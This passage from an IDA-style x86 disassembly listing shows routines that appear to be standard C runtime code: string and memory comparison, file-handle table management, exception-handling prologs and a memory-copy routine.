lea ecx, [ecx+0]
loc_41C89C: ; CODE XREF: .text:0041C8AC�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_41C8AE
add esi, 1
bt [esp], eax
jnb short loc_41C89C
loc_41C8AE: ; CODE XREF: .text:0041C8A3�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C8C0 proc near ; CODE XREF: sub_41A034+1B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41C90C
loc_41C8D0: ; CODE XREF: sub_41C8C0+3C�j
; sub_41C8C0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41C904
or al, al
jz short loc_41C900
cmp ah, [ecx+1]
jnz short loc_41C904
or ah, ah
jz short loc_41C900
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41C904
or al, al
jz short loc_41C900
cmp ah, [ecx+3]
jnz short loc_41C904
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41C8D0
mov edi, edi
loc_41C900: ; CODE XREF: sub_41C8C0+18�j
; sub_41C8C0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41C904: ; CODE XREF: sub_41C8C0+14�j
; sub_41C8C0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41C90C: ; CODE XREF: sub_41C8C0+E�j
test edx, 1
jz short loc_41C92C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41C904
add ecx, 1
or al, al
jz short loc_41C900
test edx, 2
jz short loc_41C8D0
loc_41C92C: ; CODE XREF: sub_41C8C0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41C904
or al, al
jz short loc_41C900
cmp ah, [ecx+1]
jnz short loc_41C904
or ah, ah
jz short loc_41C900
add ecx, 2
jmp short loc_41C8D0
sub_41C8C0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_41C9A2
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_41C9A3
test eax, 1
jz short loc_41C983
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41C9D0
add esi, 1
add edi, 1
sub eax, 1
jz short loc_41C9A0
loc_41C983: ; CODE XREF: .text:0041C970�j
; .text:0041C99E�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41C9D0
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41C9D0
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41C983
loc_41C9A0: ; CODE XREF: .text:0041C981�j
; .text:0041C9DA�j
pop edi
pop esi
locret_41C9A2: ; CODE XREF: .text:0041C956�j
retn
; ---------------------------------------------------------------------------
loc_41C9A3: ; CODE XREF: .text:0041C969�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41C9D8
repe cmpsd
jz short loc_41C9D8
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41C9CB
cmp ch, dh
jnz short loc_41C9CB
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41C9CB
cmp ch, dh
loc_41C9CB: ; CODE XREF: .text:0041C9B9�j
; .text:0041C9BD�j ...
mov eax, 0
loc_41C9D0: ; CODE XREF: .text:0041C976�j
; .text:0041C989�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C9D8: ; CODE XREF: .text:0041C9AB�j
; .text:0041C9AF�j
test eax, eax
jz short loc_41C9A0
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41C9CB
sub eax, 1
jz short loc_41CA05
cmp dh, ch
jnz short loc_41C9CB
sub eax, 1
jz short loc_41CA05
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41C9CB
sub eax, 1
loc_41CA05: ; CODE XREF: .text:0041C9E7�j
; .text:0041C9F0�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41CA24: ; CODE XREF: .text:0041CA31�j
mov al, [edx]
or al, al
jz short loc_41CA33
add edx, 1
bts [esp], eax
jmp short loc_41CA24
; ---------------------------------------------------------------------------
loc_41CA33: ; CODE XREF: .text:0041CA28�j
mov esi, [ebp+8]
mov edi, edi
loc_41CA38: ; CODE XREF: .text:0041CA45�j
mov al, [esi]
or al, al
jz short loc_41CA4A
add esi, 1
bt [esp], eax
jnb short loc_41CA38
lea eax, [esi-1]
loc_41CA4A: ; CODE XREF: .text:0041CA3C�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41CA50 proc near ; CODE XREF: sub_41D38D+220�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
cmp ecx, dword_47C638
push esi
push edi
jnb short loc_41CAB3
mov eax, ecx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [esi+eax], 0FFFFFFFFh
jnz short loc_41CAB3
cmp dword_42D7D4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41CAA9
sub ecx, 0
jz short loc_41CAA0
dec ecx
jz short loc_41CA9B
dec ecx
jnz short loc_41CAA9
push ebx
push 0FFFFFFF4h
jmp short loc_41CAA3
; ---------------------------------------------------------------------------
loc_41CA9B: ; CODE XREF: sub_41CA50+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_41CAA3
; ---------------------------------------------------------------------------
loc_41CAA0: ; CODE XREF: sub_41CA50+3E�j
push ebx
push 0FFFFFFF6h
loc_41CAA3: ; CODE XREF: sub_41CA50+49�j
; sub_41CA50+4E�j
call ds:dword_420150 ; SetStdHandle
loc_41CAA9: ; CODE XREF: sub_41CA50+39�j
; sub_41CA50+44�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_41CAC9
; ---------------------------------------------------------------------------
loc_41CAB3: ; CODE XREF: sub_41CA50+C�j
; sub_41CA50+2B�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41CAC9: ; CODE XREF: sub_41CA50+61�j
pop edi
pop esi
retn
sub_41CA50 endp
; =============== S U B R O U T I N E =======================================
sub_41CACC proc near ; CODE XREF: sub_417AB9+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, dword_47C638
push esi
push edi
jnb short loc_41CB32
mov eax, ecx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41CB32
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41CB32
cmp dword_42D7D4, 1
jnz short loc_41CB28
xor eax, eax
sub ecx, eax
jz short loc_41CB1F
dec ecx
jz short loc_41CB1A
dec ecx
jnz short loc_41CB28
push eax
push 0FFFFFFF4h
jmp short loc_41CB22
; ---------------------------------------------------------------------------
loc_41CB1A: ; CODE XREF: sub_41CACC+44�j
push eax
push 0FFFFFFF5h
jmp short loc_41CB22
; ---------------------------------------------------------------------------
loc_41CB1F: ; CODE XREF: sub_41CACC+41�j
push eax
push 0FFFFFFF6h
loc_41CB22: ; CODE XREF: sub_41CACC+4C�j
; sub_41CACC+51�j
call ds:dword_420150 ; SetStdHandle
loc_41CB28: ; CODE XREF: sub_41CACC+3B�j
; sub_41CACC+47�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_41CB48
; ---------------------------------------------------------------------------
loc_41CB32: ; CODE XREF: sub_41CACC+C�j
; sub_41CACC+2D�j ...
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41CB48: ; CODE XREF: sub_41CACC+64�j
pop edi
pop esi
retn
sub_41CACC endp
; =============== S U B R O U T I N E =======================================
sub_41CB4B proc near ; CODE XREF: sub_417AB9+7�p
; sub_417AB9+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_47C638
jnb short loc_41CB75
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C640[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
test byte ptr [eax+4], 1
jz short loc_41CB75
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41CB75: ; CODE XREF: sub_41CB4B+A�j
; sub_41CB4B+25�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_41CB4B endp
; =============== S U B R O U T I N E =======================================
sub_41CB8C proc near ; CODE XREF: sub_417B3C+38�p
; sub_418EB7+38�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push esi
mov ecx, eax
sar ecx, 5
and eax, 1Fh
push edi
lea ebx, ds:47C640h[ecx*4]
mov esi, [ebx]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_41CBEB
push 0Ah
call sub_4180B5
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41CBE3
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41CFB8
test eax, eax
pop ecx
pop ecx
jnz short loc_41CBE0
push 0Ah
call sub_418021
pop ecx
xor eax, eax
jmp short loc_41CBFB
; ---------------------------------------------------------------------------
loc_41CBE0: ; CODE XREF: sub_41CB8C+46�j
inc dword ptr [esi+8]
loc_41CBE3: ; CODE XREF: sub_41CB8C+32�j
push 0Ah
call sub_418021
pop ecx
loc_41CBEB: ; CODE XREF: sub_41CB8C+24�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
xor eax, eax
inc eax
loc_41CBFB: ; CODE XREF: sub_41CB8C+52�j
pop edi
pop esi
pop ebx
retn
sub_41CB8C endp
; =============== S U B R O U T I N E =======================================
sub_41CBFF proc near ; CODE XREF: sub_417BB3+1�p
; sub_418F3E+1�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C640[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+0Ch]
push eax
call ds:dword_420018 ; RtlLeaveCriticalSection
retn
sub_41CBFF endp
; =============== S U B R O U T I N E =======================================
sub_41CC21 proc near ; CODE XREF: sub_41D38D:loc_41D521�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebp
push 0Bh
or ebp, 0FFFFFFFFh
call sub_418036
test eax, eax
pop ecx
jz loc_41CD68
push ebx
push esi
push edi
push 0Bh
call sub_4180B5
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov edi, offset dword_47C640
loc_41CC51: ; CODE XREF: sub_41CC21+D5�j
mov esi, [edi]
test esi, esi
jz loc_41CD08
lea eax, [esi+480h]
jmp short loc_41CCC1
; ---------------------------------------------------------------------------
loc_41CC63: ; CODE XREF: sub_41CC21+A2�j
test byte ptr [esi+4], 1
jnz short loc_41CCB7
cmp dword ptr [esi+8], 0
jnz short loc_41CC9C
push 0Ah
call sub_4180B5
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41CC94
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41CFB8
test eax, eax
pop ecx
pop ecx
jz short loc_41CCFE
inc dword ptr [esi+8]
loc_41CC94: ; CODE XREF: sub_41CC21+5A�j
push 0Ah
call sub_418021
pop ecx
loc_41CC9C: ; CODE XREF: sub_41CC21+4C�j
lea ebx, [esi+0Ch]
push ebx
call ds:dword_42001C ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_41CCC7
push ebx
call ds:dword_420018 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_41CCB7: ; CODE XREF: sub_41CC21+46�j
mov eax, [edi]
add esi, 24h
add eax, 480h
loc_41CCC1: ; CODE XREF: sub_41CC21+40�j
cmp esi, eax
jb short loc_41CC63
jmp short loc_41CCE3
; ---------------------------------------------------------------------------
loc_41CCC7: ; CODE XREF: sub_41CC21+89�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [edi]
push 24h
cdq
pop ecx
idiv ecx
mov ebp, eax
add ebp, [esp+18h+var_4]
cmp ebp, 0FFFFFFFFh
jnz short loc_41CD5D
mov ebx, [esp+18h+var_8]
loc_41CCE3: ; CODE XREF: sub_41CC21+A4�j
add [esp+18h+var_4], 20h
inc ebx
add edi, 4
cmp edi, offset dword_47C740
mov [esp+18h+var_8], ebx
jl loc_41CC51
jmp short loc_41CD5D
; ---------------------------------------------------------------------------
loc_41CCFE: ; CODE XREF: sub_41CC21+6E�j
push 0Ah
call sub_418021
pop ecx
jmp short loc_41CD5A
; ---------------------------------------------------------------------------
loc_41CD08: ; CODE XREF: sub_41CC21+34�j
mov esi, 480h
push esi
call sub_414CAD
test eax, eax
pop ecx
jz short loc_41CD5D
add dword_47C638, 20h
lea ecx, ds:47C640h[ebx*4]
mov [ecx], eax
lea edx, [eax+480h]
jmp short loc_41CD46
; ---------------------------------------------------------------------------
loc_41CD30: ; CODE XREF: sub_41CC21+127�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
loc_41CD46: ; CODE XREF: sub_41CC21+10D�j
cmp eax, edx
jb short loc_41CD30
shl ebx, 5
mov ebp, ebx
push ebp
call sub_41CB8C
test eax, eax
pop ecx
jnz short loc_41CD5D
loc_41CD5A: ; CODE XREF: sub_41CC21+E5�j
or ebp, 0FFFFFFFFh
loc_41CD5D: ; CODE XREF: sub_41CC21+BC�j
; sub_41CC21+DB�j ...
push 0Bh
call sub_418021
pop ecx
pop edi
pop esi
pop ebx
loc_41CD68: ; CODE XREF: sub_41CC21+10�j
mov eax, ebp
pop ebp
pop ecx
pop ecx
retn
sub_41CC21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD6E proc near ; CODE XREF: sub_417C5F+1E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041CE16 SIZE 00000014 BYTES
push 0Ch
push offset stru_429A48
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C638
jnb loc_41CE16
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41CE16
push ebx
call sub_41CB8C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41CDEE
push ebx
call sub_41CB4B
pop ecx
push eax
call ds:dword_42014C ; FlushFileBuffers
test eax, eax
jnz short loc_41CDDA
call ds:dword_420008 ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_41CDDE
; ---------------------------------------------------------------------------
loc_41CDDA: ; CODE XREF: sub_41CD6E+5F�j
and [ebp+var_1C], 0
loc_41CDDE: ; CODE XREF: sub_41CD6E+6A�j
cmp [ebp+var_1C], 0
jz short loc_41CDFD
call sub_419439
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_41CDEE: ; CODE XREF: sub_41CD6E+4D�j
call sub_419430
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41CDFD: ; CODE XREF: sub_41CD6E+74�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41CE0E
mov eax, [ebp+var_1C]
jmp short loc_41CE24
sub_41CD6E endp
; =============== S U B R O U T I N E =======================================
sub_41CE0B proc near ; DATA XREF: .rdata:stru_429A48�o
mov ebx, [ebp+8]
sub_41CE0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41CE0E proc near ; CODE XREF: sub_41CD6E+93�p
push ebx
call sub_41CBFF
pop ecx
retn
sub_41CE0E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41CD6E
loc_41CE16: ; CODE XREF: sub_41CD6E+15�j
; sub_41CD6E+39�j
call sub_419430
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_41CE24: ; CODE XREF: sub_41CD6E+9B�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41CD6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417E14
loc_41CE2A: ; CODE XREF: sub_417E14+E�j
push 10h
push offset stru_429A58
call __SEH_prolog
xor ebx, ebx
mov [ebp-1Ch], ebx
push 1
call sub_4180B5
pop ecx
mov [ebp-4], ebx
push 3
pop edi
loc_41CE49: ; CODE XREF: sub_417E14+5094�j
mov [ebp-20h], edi
cmp edi, dword_47D9C0
jge short loc_41CEAA
mov esi, edi
shl esi, 2
mov eax, dword_47C9A4
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41CEA7
test byte ptr [eax+0Ch], 83h
jz short loc_41CE7A
push eax
call sub_4147F3
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41CE7A
inc dword ptr [ebp-1Ch]
loc_41CE7A: ; CODE XREF: sub_417E14+5055�j
; sub_417E14+5061�j
cmp edi, 14h
jl short loc_41CEA7
mov eax, dword_47C9A4
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_420024 ; RtlDeleteCriticalSection
mov eax, dword_47C9A4
push dword ptr [esi+eax]
call sub_414844
pop ecx
mov eax, dword_47C9A4
mov [esi+eax], ebx
loc_41CEA7: ; CODE XREF: sub_417E14+504F�j
; sub_417E14+5069�j
inc edi
jmp short loc_41CE49
; ---------------------------------------------------------------------------
loc_41CEAA: ; CODE XREF: sub_417E14+503E�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_41CEBC
mov eax, [ebp-1Ch]
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417E14
; =============== S U B R O U T I N E =======================================
sub_41CEBC proc near ; CODE XREF: sub_417E14+509A�p
; DATA XREF: .rdata:stru_429A58�o
push 1
call sub_418021
pop ecx
retn
sub_41CEBC endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CED0 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41CF70
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41CF03: ; CODE XREF: sub_41CED0+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41CF69
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41CF57
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41CF57
js short loc_41CF62
mov edi, [ebx+8]
push ebx
call sub_4157A0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4157E2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_415876
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41CF57: ; CODE XREF: sub_41CED0+40�j
; sub_41CED0+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41CF03
; ---------------------------------------------------------------------------
loc_41CF62: ; CODE XREF: sub_41CED0+54�j
mov eax, 0
jmp short loc_41CF85
; ---------------------------------------------------------------------------
loc_41CF69: ; CODE XREF: sub_41CED0+36�j
mov eax, 1
jmp short loc_41CF85
; ---------------------------------------------------------------------------
loc_41CF70: ; CODE XREF: sub_41CED0+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4157E2
add esp, 8
pop ebp
mov eax, 1
loc_41CF85: ; CODE XREF: sub_41CED0+97�j
; sub_41CED0+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41CED0 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4157E2
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_41CFA8: ; DATA XREF: sub_41CFB8:loc_41CFFA�o
push dword ptr [esp+4]
call ds:dword_420148 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CFB8 proc near ; CODE XREF: sub_417F83+26�p
; sub_418036+49�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_429A90
call __SEH_prolog
mov eax, dword_47C51C
test eax, eax
jnz short loc_41D004
cmp dword_47C1C4, 1
jz short loc_41CFFA
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4200A4 ; GetModuleHandleA
test eax, eax
jz short loc_41CFFA
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:dword_420084 ; GetProcAddress
mov dword_47C51C, eax
test eax, eax
jnz short loc_41D004
loc_41CFFA: ; CODE XREF: sub_41CFB8+1C�j
; sub_41CFB8+2B�j
mov eax, offset loc_41CFA8
mov dword_47C51C, eax
loc_41D004: ; CODE XREF: sub_41CFB8+13�j
; sub_41CFB8+40�j
and [ebp+ms_exc.disabled], 0
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; InitializeCriticalSectionAndSpinCount
mov [ebp+var_1C], eax
jmp short loc_41D039
; ---------------------------------------------------------------------------
loc_41D015: ; DATA XREF: .rdata:stru_429A90�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D023: ; DATA XREF: .rdata:stru_429A90�o
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_20], 0C0000017h
jnz short loc_41D037
push 8
call ds:dword_420170 ; RtlRestoreLastWin32Error
loc_41D037: ; CODE XREF: sub_41CFB8+75�j
xor eax, eax
loc_41D039: ; CODE XREF: sub_41CFB8+5B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_41CFB8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D050 proc near ; CODE XREF: sub_418159+2DE�p
; sub_4196B6+13�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41D070
cmp edi, eax
jb loc_41D1EC
loc_41D070: ; CODE XREF: sub_41D050+16�j
test edi, 3
jnz short loc_41D08C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41D0AC
rep movsd
jmp ds:off_41D19C[edx*4]
; ---------------------------------------------------------------------------
loc_41D08C: ; CODE XREF: sub_41D050+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41D0A4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41D0AC+4[eax*4]
; ---------------------------------------------------------------------------
loc_41D0A4: ; CODE XREF: sub_41D050+46�j
jmp dword ptr ds:loc_41D1AC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D0AC: ; CODE XREF: sub_41D050+31�j
; sub_41D050+8E�j ...
jmp ds:off_41D130[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41D0C0
dd offset loc_41D0EC
dd offset loc_41D110
; ---------------------------------------------------------------------------
loc_41D0C0: ; DATA XREF: sub_41D050+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41D0AC
rep movsd
jmp ds:off_41D19C[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D0EC: ; DATA XREF: sub_41D050+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41D0AC
rep movsd
jmp ds:off_41D19C[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41D110: ; DATA XREF: sub_41D050+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41D0AC
rep movsd
jmp ds:off_41D19C[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41D130 dd offset loc_41D193 ; DATA XREF: sub_41D050:loc_41D0AC�r
dd offset loc_41D180
dd offset loc_41D178
dd offset loc_41D170
dd offset loc_41D168
dd offset loc_41D160
dd offset loc_41D158
dd offset loc_41D150
; ---------------------------------------------------------------------------
loc_41D150: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41D158: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41D160: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41D168: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41D170: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41D178: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41D180: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41D193: ; CODE XREF: sub_41D050:loc_41D0AC�j
; DATA XREF: sub_41D050:off_41D130�o
jmp ds:off_41D19C[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D19C dd offset loc_41D1AC ; DATA XREF: sub_41D050+35�r
; sub_41D050+92�r ...
dd offset loc_41D1B4
dd offset loc_41D1C0
dd offset loc_41D1D4
; ---------------------------------------------------------------------------
loc_41D1AC: ; CODE XREF: sub_41D050+35�j
; sub_41D050+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D1B4: ; CODE XREF: sub_41D050+35�j
; sub_41D050+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D1C0: ; CODE XREF: sub_41D050+35�j
; sub_41D050+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D1D4: ; CODE XREF: sub_41D050+35�j
; sub_41D050+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D1EC: ; CODE XREF: sub_41D050+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41D220
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41D214
std
rep movsd
cld
jmp ds:off_41D338[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D214: ; CODE XREF: sub_41D050+1B5�j
; sub_41D050+210�j ...
neg ecx
jmp dword ptr ds:loc_41D2E7+1[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41D220: ; CODE XREF: sub_41D050+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
